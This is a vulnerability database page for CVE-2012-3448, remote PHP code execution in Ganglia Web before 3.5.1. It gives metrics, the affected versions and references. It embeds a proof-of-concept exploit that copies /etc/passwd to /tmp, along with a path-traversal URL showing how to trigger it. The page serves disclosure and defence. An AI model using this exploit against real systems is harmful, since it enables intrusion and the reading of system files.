CVE-2012-3448 : Detail

CVE-2012-3448

25.96%V4
Network
2012-08-06
16h00 +00:00
2018-08-03
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 38030

Publication date : 2015-08-30 22h00 +00:00
Author : Andrei Costin
EDB Verified : No

<?php /* ################################################################################ # # Author : Andrei Costin (andrei theATsign firmware theDOTsign re) # Desc : CVE-2012-3448 PoC # Details : This PoC will create a dummy file in the /tmp folder and # will copy /etc/passwd to /tmp. # To modify the attack payload, modify the code below.\ # Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0 # ################################################################################ 1. Assuming that ganglia is installed on the target machine at this path: /var/www/html/ganglia/ 2. Assuming the attacker has minimal access to the target machine and can write to "/tmp". There are several methods where a remote attacker can also trigger daemons or other system processes to create files in "/tmp" whose content is (partially) controlled by the remote attacker. 3. The attacker puts the contents of this PoC file into the file: /tmp/attack.php 4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 as: http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY 5. Confirm that the PoC created a dummy file in the /tmp folder and copied /etc/passwd to /tmp. */ eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");'); die("Triggering CVE-2012-3448 attack.php"); ?>

Products Mentioned

Configuraton 0

Ganglia>>Ganglia-web >> Version To (including) 3.5.0

Ganglia>>Ganglia-web >> Version 2.1.0

Ganglia>>Ganglia-web >> Version 2.1.1

Ganglia>>Ganglia-web >> Version 2.1.2

Ganglia>>Ganglia-web >> Version 2.1.3

Ganglia>>Ganglia-web >> Version 2.1.5

Ganglia>>Ganglia-web >> Version 2.1.6

Ganglia>>Ganglia-web >> Version 2.1.7

Ganglia>>Ganglia-web >> Version 2.1.8

Ganglia>>Ganglia-web >> Version 2.2.0

Ganglia>>Ganglia-web >> Version 3.3.0

Ganglia>>Ganglia-web >> Version 3.3.1

Ganglia>>Ganglia-web >> Version 3.4.1

Ganglia>>Ganglia-web >> Version 3.4.2

References

http://www.securityfocus.com/bid/54699
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/38030/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.openwall.com/lists/oss-security/2012/08/02/1
Tags : mailing-list, x_refsource_MLIST
http://www.debian.org/security/2013/dsa-2610
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/50047
Tags : third-party-advisory, x_refsource_SECUNIA
http://ganglia.info/?p=549
Tags : x_refsource_CONFIRM